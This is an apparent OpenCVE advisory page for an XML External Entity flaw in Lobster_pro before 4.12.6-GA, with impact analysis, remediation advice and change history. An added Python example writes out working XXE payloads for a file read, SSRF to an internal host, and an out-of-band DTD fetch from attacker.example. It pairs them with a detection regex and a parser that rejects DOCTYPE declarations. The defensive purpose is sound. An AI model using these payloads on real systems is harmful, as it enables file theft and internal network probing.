Description
Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.
Published: 2026-04-30
Score: 7.7 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Unauthenticated attackers can trigger XML External Entity (XXE) processing (CWE-611) in Lobster_pro prior to version 4.12.6‑GA. Because the parser resolves external entities with the privileges and network position of the application server, a crafted DOCTYPE lets the attacker read files on the server and on network shares the server can reach, and makes the server issue HTTP GET requests to arbitrary services, internal as well as external (server-side request forgery). The result is unauthorized disclosure of sensitive data plus an outbound request primitive that can be used to reach and probe systems behind the server.

Affected Systems

Lobster GmbH’s Lobster_pro is affected. All releases older than 4.12.6‑GA on Windows platforms are vulnerable and must be upgraded.

Risk and Exploitability

The CVSS v4.0 base score of 7.7 (High) reflects a network-reachable flaw that needs no privileges or user interaction (AV:N/PR:N/UI:N) and whose largest impact is on the confidentiality of subsequent systems (SC:H): the files and hosts the server can reach, not only the server itself (VC:L). EPSS is below 1%, so the estimated probability of exploitation in the wild is currently very low, and the vulnerability is not listed in CISA's KEV catalog. The SSVC assessment records Exploitation: none but Automatable: yes, so exposed instances are easy to find and test at scale. The attack path is an unauthenticated client submitting XML containing a malicious DOCTYPE to any endpoint the application parses. Successful exploitation discloses confidential data and generates outbound HTTP traffic from the server that can be used to map or pivot to internal services, or to exfiltrate data out of band.

Generated by OpenCVE AI on May 1, 2026 at 05:12 UTC.

Remediation

Vendor Solution

Update to Lobster_pro release 4.12.6-GA or higher.


OpenCVE Recommended Actions

  • Update Lobster_pro to release 4.12.6‑GA or newer.
  • If upgrading immediately is not possible, configure the XML parser that handles untrusted input to reject DOCTYPE declarations and external entity resolution (general and parameter entities), or front the endpoint with a filter that drops XML carrying a DTD.
  • Restrict outbound HTTP traffic from the application server with egress firewall rules and alert on requests to unexpected hosts; the SSRF half of this flaw depends on the server being allowed to reach them.
  • Because the file read extends to adjacent network shares, review which shares the Lobster_pro service account can read and remove access it does not need.
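The following is an added example, not code from Lobster_pro or from the advisory. It shows the three request shapes the recommendations above are defending against (local file read, SSRF via HTTP GET, and the out-of-band parameter-entity variant) as constructed payloads, a cheap pre-parse screen usable as a WAF or log rule, and a fail-closed parser that refuses any DOCTYPE before an entity could be resolved. Python's expat is used only as a stand-in, since the page does not name the parser Lobster_pro uses; the <order> document shape and every host and path are hypothetical.

```python
"""Added example, not code from Lobster_pro or from the advisory.

Three constructed XXE payloads of the kinds CWE-611 covers in this CVE (local file
read, SSRF via HTTP GET, and the out-of-band parameter-entity variant) and a
fail-closed parser that refuses them before any entity could be resolved.
Python's expat is a stand-in; the parser Lobster_pro uses is not named on the page.
The document shape (<order>) and all hosts/paths are hypothetical.
"""
import re
import xml.parsers.expat as expat

BENIGN_DOC = b'<?xml version="1.0"?><order><id>42</id><note>hello</note></order>'

# General external entity pointing at a local file: its contents come back in <note>.
FILE_READ_PAYLOAD = b'''<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<order><id>42</id><note>&xxe;</note></order>'''

# Same mechanism with a URL: the server issues the HTTP GET on the attacker's behalf.
SSRF_PAYLOAD = b'''<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "http://10.0.0.5:8080/admin">
]>
<order><id>42</id><note>&xxe;</note></order>'''

# Parameter entity fetching an external DTD: data can leave inside the outbound
# request itself, so the attacker needs no reflected output at all.
OOB_PAYLOAD = b'''<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<order><id>42</id><note>x</note></order>'''

# Cheap screen for inbound requests or logs: a DOCTYPE plus an external entity
# declaration. This is a screen only; the parser setting below is the real control.
DOCTYPE_RE = re.compile(rb'<!DOCTYPE', re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(rb'<!ENTITY\s+(%\s+)?\w+\s+(SYSTEM|PUBLIC)\b', re.IGNORECASE)


def looks_like_xxe(data: bytes) -> bool:
    """True if the document declares a DTD containing a SYSTEM or PUBLIC entity."""
    return bool(DOCTYPE_RE.search(data) and EXTERNAL_ENTITY_RE.search(data))


class UnsafeXml(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an external entity reference."""


def parse_untrusted(data: bytes) -> dict:
    """Parse untrusted XML and return {element: text} for elements that carry text.

    The DOCTYPE callback raises before the DTD is processed, so no entity is ever
    defined, let alone fetched. The external-entity callback is defence in depth:
    expat calls it only when an external entity is actually referenced, and raising
    there guarantees no file or socket is opened even if the first check were removed.
    Malformed XML raises expat.ExpatError as usual.
    """
    parser = expat.ParserCreate()
    fields, text = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE not allowed in untrusted input (root {name!r})")

    def external_entity_ref(context, base, sysid, pubid):
        raise UnsafeXml(f"refusing to resolve external entity {sysid!r}")

    def start_element(tag, attrs):
        text.clear()

    def character_data(chunk):  # expat may deliver one element's text in several chunks
        text.append(chunk)

    def end_element(tag):
        value = "".join(text).strip()
        if value:
            fields[tag] = value
        text.clear()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = character_data
    parser.EndElementHandler = end_element
    parser.Parse(data, True)
    return fields


def is_rejected(data: bytes) -> bool:
    """True if parse_untrusted refuses the document as unsafe."""
    try:
        parse_untrusted(data)
    except UnsafeXml:
        return True
    return False


if __name__ == "__main__":
    print("benign:", parse_untrusted(BENIGN_DOC))
    for name, payload in [("file read", FILE_READ_PAYLOAD), ("ssrf", SSRF_PAYLOAD), ("oob", OOB_PAYLOAD)]:
        print(f"{name}: screen={looks_like_xxe(payload)} rejected={is_rejected(payload)}")
```

The regex screen catches all three constructed payloads but is easy to evade (entity declarations can live in an external DTD referenced from the DOCTYPE itself), which is why the parser-level rejection is the control and the screen is only for triage and alerting. The same fail-closed setting exists in every mainstream parser; in Java's JAXP, for instance, it is the `http://apache.org/xml/features/disallow-doctype-decl` feature set to true on the factory.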

Advisories

No advisories yet.

History

Fri, 01 May 2026 08:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared  -                Lobster; Lobster lobster Pro
Vendors & Products   -                Lobster; Lobster lobster Pro

Thu, 30 Apr 2026 14:15:00 +0000

Type      Values Removed   Values Added
Metrics   -                ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 30 Apr 2026 13:00:00 +0000

Type                 Values Removed   Values Added
Description          -                Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.
Title                -                Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro
First Time appeared  -                Lobster Gmbh; Lobster Gmbh lobster Pro
Weaknesses           -                CWE-611
CPEs                 -                cpe:2.3:a:lobster_gmbh:lobster_pro:*:*:windows:*:*:*:*:*; cpe:2.3:a:lobster_gmbh:lobster_pro:4.12.6-ga:*:windows:*:*:*:*:*
Vendors & Products   -                Lobster Gmbh; Lobster Gmbh lobster Pro
References           -                -
Metrics              -                cvssV4_0 {'score': 7.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N/S:N/AU:Y/V:C'}


MITRE

Status: PUBLISHED

Assigner: SCHUTZWERK

Published:

Updated: 2026-04-30T13:15:37.670Z

Reserved: 2025-07-03T09:19:50.254Z

Link: CVE-2024-13971

Vulnrichment

Updated: 2026-04-30T13:15:33.919Z

NVD

Status : Awaiting Analysis

Published: 2026-04-30T13:16:02.680

Modified: 2026-04-30T15:48:26.580

Link: CVE-2024-13971

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-01T08:21:25Z

Weaknesses